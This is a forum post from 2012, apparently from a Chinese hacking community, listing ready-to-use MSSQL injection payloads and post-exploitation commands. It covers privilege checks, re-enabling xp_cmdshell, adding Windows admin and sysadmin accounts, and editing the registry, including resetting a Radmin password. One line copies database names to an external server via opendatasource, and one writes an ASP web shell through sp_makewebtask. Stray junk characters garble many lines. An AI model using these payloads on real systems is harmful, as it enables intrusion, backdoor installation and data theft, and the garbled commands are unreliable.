找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1825|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的0 f7 x& K/ ?/ f: S  [. D
and 1=(Select IS_MEMBER('db_owner'))" g& [: L+ E6 h
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
- x; q2 e& K& v; W+ j
7 ^+ p9 B! f$ V! h2 C& V% _//检测是否有读取某数据库的权限( k) M8 a8 R6 M' e% O3 a$ H5 y
and 1= (Select HAS_DBACCESS('master'))4 X5 G, K9 y* k7 v& K) c* |* [
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
7 v" `  l8 h( D" t+ h  `2 F. l) F  J
. Q( p' b( @  ^. v9 t- d$ F6 W6 {' _1 y. d9 w' [: `& |
数字类型
+ D- q5 c0 p1 l  b3 ]$ nand char(124)%2Buser%2Bchar(124)=0, r, U! \' e7 `
8 W5 F) F1 W5 P% Y( d: S
字符类型8 w* M# u9 T1 Z7 x; y: A
' and char(124)%2Buser%2Bchar(124)=0 and ''='
# w# I* @& J; L* ~
+ P# L- ~$ r) t2 m& R. I: t搜索类型% t3 w0 C4 e) W1 z- J
' and char(124)%2Buser%2Bchar(124)=0 and '%'='7 _! z2 t3 P: O# p
+ h6 H# I- o2 z' G. W
爆用户名+ u- ^3 p) ]& f' h! _
and user>0, n) _# ^' J' U6 Z5 B
' and user>0 and ''='9 }" e% F' e2 f
2 |6 |' b9 p* u+ ^* v; ?5 K
检测是否为SA权限1 w1 }7 g5 U3 m. Z( C  I! O# }
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--9 p1 `  y6 T" Q5 t# {% }
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
$ R" B5 L3 [# {; G6 ~% K8 v8 H+ T2 L% A7 B9 f3 u6 Z! h" b. P
检测是不是MSSQL数据库0 G; H, ^- b# N6 }  S+ u6 b. T3 i  |
and exists (select * from sysobjects);--/ W0 g9 y2 p1 J. z

* E; s( U+ y# ~2 _/ e* q# t" |检测是否支持多行
! U4 P7 R  G5 g$ [& e3 H;declare @d int;--; _" W' v$ M3 A0 d) C

+ w" H& n8 v7 ~8 \) a9 V- n恢复 xp_cmdshell
) M1 _( _8 R0 g; V;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--' x$ }! ]8 n9 M4 I' C& R- }6 ?) n$ C

" J  `3 k1 n& j; W* l; V0 O6 _1 M' f& R4 m- K3 N
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 r9 ^. ]: |- o) C
4 [* s# p  l; ?7 K* M  w5 m( p5 @//-----------------------
3 e2 r8 w+ g% z7 e9 G( V. \//       执行命令
; x7 z: \% j# d% j//-----------------------
- P4 e+ d  ^  b4 n$ [首先开启沙盘模式:3 s2 j# n1 l" o) O
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 C: D9 W% C  P$ R) r5 _0 H" i7 F% @; I. ^
然后利用jet.oledb执行系统命令
* [( Q) r  B+ Q$ g# W2 B2 vselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
; l2 ~6 ^* J$ D4 Z: y% H
! c3 N  x8 e0 M! w9 t+ d执行命令. v8 L9 ~& |1 G$ b! O  v3 \
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--6 _  W$ W* X. |+ y* J

; D; n% G% o: a& D( I0 @  }, UEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
' f* N! C3 X: {( Q7 @( n, x( [
判断xp_cmdshell扩展存储过程是否存在:5 G! }. b3 r6 {6 v+ D( [
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
9 f, d& w/ b8 X7 i4 c& M2 K  o
! j: j) d& O' \& ]& l, Z写注册表
) d0 Q2 f( H; Y! n+ mexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',12 M& d9 c, ?6 {7 Y( c- [* g* ?- s

6 f$ W1 |; b- [* b- m( x0 AREG_SZ
2 c" R& r- E2 T4 n4 R$ Z/ H& h4 ^0 J" r4 S" O
读注册表! ?7 |1 R& W8 L/ x8 F
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
$ s, Y8 x9 T* U% t" J+ \2 b6 ~& e' }7 l7 s$ z
读取目录内容0 F+ v. i# G& ~4 E% x
exec master..xp_dirtree 'c:\winnt\system32\',1,1
* [' j  k) R8 x. ]7 b9 r
4 w; o% M: l+ m) Y$ k9 G% \. W1 o. n7 {3 ]# d6 k& u
数据库备份
8 }: _+ c& p4 ubackup database pubs to disk = 'c:\123.bak', r3 t2 I" H7 g* v3 R; J6 }0 I

% W2 h, j/ \+ B2 X//爆出长度! e7 Q, Q) G1 I- B1 A; o8 j+ n
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
$ p6 M" B4 r4 O7 u0 J+ k5 P+ F5 c# i$ x' \% R3 x# G

$ r7 R; }5 S6 z5 L
% L; l/ R& ~# w' ?5 s# A8 }" g9 j更改sa口令方法:用sql综合利用工具连接后,执行命令:0 U" s3 N0 m# N7 B0 g
exec sp_password NULL,'新密码','sa'
! J7 k/ q, ?* f# `2 z, H! q* D& Z' ^/ ]0 z, q" J
添加和删除一个SA权限的用户test:
! z! i0 P# R- ]7 o) q! Eexec master.dbo.sp_addlogin test,95307721 O. b$ ^! |: u7 _' D1 [( y
exec master.dbo.sp_addsrvrolemember test,sysadmin3 ~$ Z; m% B( {* q) h* R
6 ?/ C- p* ]3 q
删除扩展存储过过程xp_cmdshell的语句:
" ~' Z: r$ F$ O& p! D7 X1 ?# nexec sp_dropextendedproc 'xp_cmdshell') g) a- U" z; p6 h" w
7 f. [3 Z0 Z% ?( }  d8 |2 q
添加扩展存储过过程
% ~: L2 E/ T4 H6 kEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'5 K- z- |" ~- R6 w! {) l2 }- ^
GRANT exec On xp_proxiedadata TO public" t& ?, Z" B4 I0 p
, ~6 Q* N9 G  _8 u
  s: Q$ @( i8 s0 J) U) \6 i
停掉或激活某个服务。
" h) a& {5 `5 M: K2 Q  R
7 U* Q+ s4 I* ~5 T' I) r6 qexec master..xp_servicecontrol 'stop','schedule'
( U6 O  w+ S2 \0 c4 K% f8 jexec master..xp_servicecontrol 'start','schedule'
, P. _- n$ O5 {6 P$ T* k& Q8 v7 ?" L" N- p# C" j
dbo.xp_subdirs8 m/ H% r  U8 l  @

3 V, D5 z4 H5 k2 x! v  T% C6 }4 _只列某个目录下的子目录。
6 H0 u4 q: \; f7 A5 \( |+ ~- R1 J' Qxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
- F. D- S/ V% C6 B$ o
- e2 l+ g5 O! \/ r  f0 Pdbo.xp_makecab: v2 S- h6 H, J5 q( i) |8 n; v
0 X/ C: X  A! t: z
将目标多个档案压缩到某个目标档案之内。
7 O: H* x" t3 X$ d! A" }8 `) z/ D1 A, c所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。6 ?$ E) v, t3 @8 |, p. M4 v, a% _

/ e: R9 V$ ?, p3 Vdbo.xp_makecab& x+ h: {& J/ w1 g; J) F7 B
'c:\test.cab','mszip',1,
" [; W1 R/ e  o. k'C:\Inetpub\wwwroot\SQLInject\login.asp',
. z0 M1 _0 G' |'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'1 B' y7 l9 X; {, G/ {/ E, x: J# `
7 a8 h" M( K* L" Z8 y& W
xp_terminate_process# G1 X% [  C  ^, R
: `- y! C1 i0 D  f
停掉某个执行中的程序,但赋予的参数是 Process ID。
7 l' A6 _# j4 A' ]' k" J* `利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
7 D2 O$ k& B  k6 [7 k1 ^9 k0 x+ ^1 d- J0 j. Y
xp_terminate_process 2484
, X: x% z- q$ q! l& x+ D' Y9 I! b" u: P
, b" Z6 ~, H. X7 R# E  y6 D4 {2 I1 Rxp_unpackcab# S5 E/ o' w; E

( O! c  N  @% G$ ~4 [解开压缩档。
5 _* l- q$ [2 x1 ]' S+ `6 ]3 a' \6 r+ [& F
xp_unpackcab 'c:\test.cab','c:\temp',1
  M4 [2 L, t% d; }% u/ k, ]4 \3 v# F
7 ]% r" u/ W. f
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
8 q& y& B1 m. p0 E8 l3 T% a9 }$ n5 O* [" R" C& O6 M) ]. ~6 D
create database lcx;
8 |) a4 o: S4 s5 jCreate TABLE ku(name nvarchar(256) null);# {* d* \* H4 `
Create TABLE biao(id int NULL,name nvarchar(256) null);0 v; c) H, B. u: t) j; i( ]: S

/ ?% s$ C; a0 ~/ Q' H* O/ ~//得到数据库名0 D! Z  S4 |3 `# a. m
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
. C2 w# T0 F2 B! R& n  k% p7 Y- z6 S  z4 [0 {
/ S. ]8 P' r5 `3 y9 x" B* t* I
//在Master中创建表,看看权限怎样
2 V+ D. ^4 H4 s6 x9 q8 f& @2 YCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
% }' h' M) @2 i5 m- I9 H& o0 x3 I- Z
用 sp_makewebtask直接在web目录里写入一句话马:
, V* F5 Q& `, W) y2 |http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--0 ?, ]  j# z' H# Z1 x, }9 m" I' K2 f
. D7 a; H) E3 l* y! o  w) B* c. w4 H
//更新表内容
; M# E( S! n) H# f, yUpdate films SET kind = 'Dramatic' Where id = 123
1 X! ]$ Y% R2 ~$ J7 }. _4 Z' ?. C( b3 B4 Z% O, ~  Q, A$ ?! ?+ z
//删除内容
  z" L5 u; K$ @$ h5 h* vdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表